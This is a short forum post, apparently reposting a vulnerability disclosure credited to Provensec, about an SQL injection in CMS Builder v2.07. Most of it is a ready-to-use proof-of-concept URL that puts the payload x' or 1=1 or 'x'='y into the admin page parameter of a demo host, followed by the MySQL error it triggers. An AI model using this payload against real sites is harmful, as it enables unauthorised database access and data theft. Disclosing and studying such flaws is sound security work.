Aerosol Posted March 28, 2015 Report Posted March 28, 2015 # Affected software: CMS Builder v2.07# Type of vulnerability: sql injection# URL: http://demo2.interactivetools.com/cmsbuilder2/bottom.php# Discovered by: Provensec# Website: http://www.provensec.com#versionv2.07# Proof of concepthttp://demo2.interactivetools.com/cmsAdmin2/admin.php?menu=services&_action=list&page=payloaddemo:->http://demo2.interactivetools.com/cmsAdmin2/admin.php?menu=services&_action=list&page=x%27%20or%201=1%20or%20%27x%27=%27yMySQL Error: You have an error in your SQL syntax; check the manual thatcorresponds to your MySQL server version for the right syntax to use near'-25' at line 9Source Quote